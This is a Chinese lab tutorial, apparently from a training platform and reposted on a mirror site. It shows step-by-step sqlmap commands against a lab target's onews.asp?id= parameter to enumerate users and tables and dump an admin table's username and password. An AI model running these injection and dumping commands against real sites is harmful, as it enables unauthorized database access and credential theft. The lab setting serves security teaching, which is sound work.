zoukankan      html  css  js  c++  java
  • Sqlmap数据库注入攻击

    实验目的

    利用sqlmap命令破解出access数据中的admin的密码bfpns

    实验原理

    SQLMap是一个先进的自动化SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。目前支持的数据库管理系统包括Ms-soL、MySQL、Oracde和PostgreSQL.也能够识别诸如DB2、Informix. Sybase、Interbase和MS Access之类的数据库系统。SQLMap采用四种独特的SQL注入技术,分别是盲推理SQL注入、union查询SQL注入、堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹、枚举、数据提取、访问目标文件系统,并在获取完全操作权限时执行任意命令。此外,该工具还可以从Burp Proxy直Web Scarab日志及标准的文本文件中解析目标列表。更突出的是,它提供采用分类Coogle dorks扫描Oragle拽索引擎,获取指定目标的功能。

    实验内容

    sqlmap命令破解出access数据中的admin的密码bfpns

    实验环境描述

    攻击机Kali操作系统

    用户名密码为:root toor

    靶机

    用户名密码为:admin 123456

    实验步骤

    一、Sqlmap破解access数据库 1.1单击桌面空白处,右键菜单选择“在终端中打开”。如图1所示(有询问信息返回的,看返回的信息,输入Y或者N,看返回的情况而定);

    图片描述

    1.2在终端中输入命令“sqlmap –u http://192.168.10.147:99/onews.asp?id=45”,-u扫描注入点扫描目标主机,检测出的信息准确。如图2所示

    图片描述

    1.3在终端中输入命令“sqlmap –u http://192.168.10.147:99/onews.asp?id=45 --users”获取到用户名。如图3所示

    图片描述

    1.4在终端中输入命令“sqlmap –u http://192.168.10.147:99/onews.asp?id=45 -–dump –tables”探测数据库和表信息。如图4所示

    图片描述

    1.5显示探测出来的字段信息。如图5所示

    图片描述

    1.6针对admin表探测出的结构。如图6所示

    图片描述

    1.7在终端中输入命令” sqlmap -u "http://192.168.10.147:99/onews.asp?id=45" --dump -T admin -C admin,password”,进行暴库,获得用户名和密码。如图7所示

    图片描述

    1.8已经猜解出来用户名为admin。如图8所示

    图片描述

  • 相关阅读:
    C#:友元程序集
    C#/Net代码精简优化技巧(3)
    Net4.0AspNet中URL重写的改进
    JQuery boxy插件的确认框在AspNet中的应用
    在数据库中将字表中的多行合并到一列中
    软件推荐:磁盘搜索软件Everything
    Net4.0对HTML净化的处理
    C#/Net代码精简优化技巧(2)
    推荐两款富文本编辑器:NicEdit和Kindeditor
    ASP.NET MVC+EF框架+EasyUI实现权限管理系列(11)验证码实现和底层修改
  • 原文地址:https://www.cnblogs.com/lzkalislw/p/13627173.html
Copyright © 2011-2022 走看看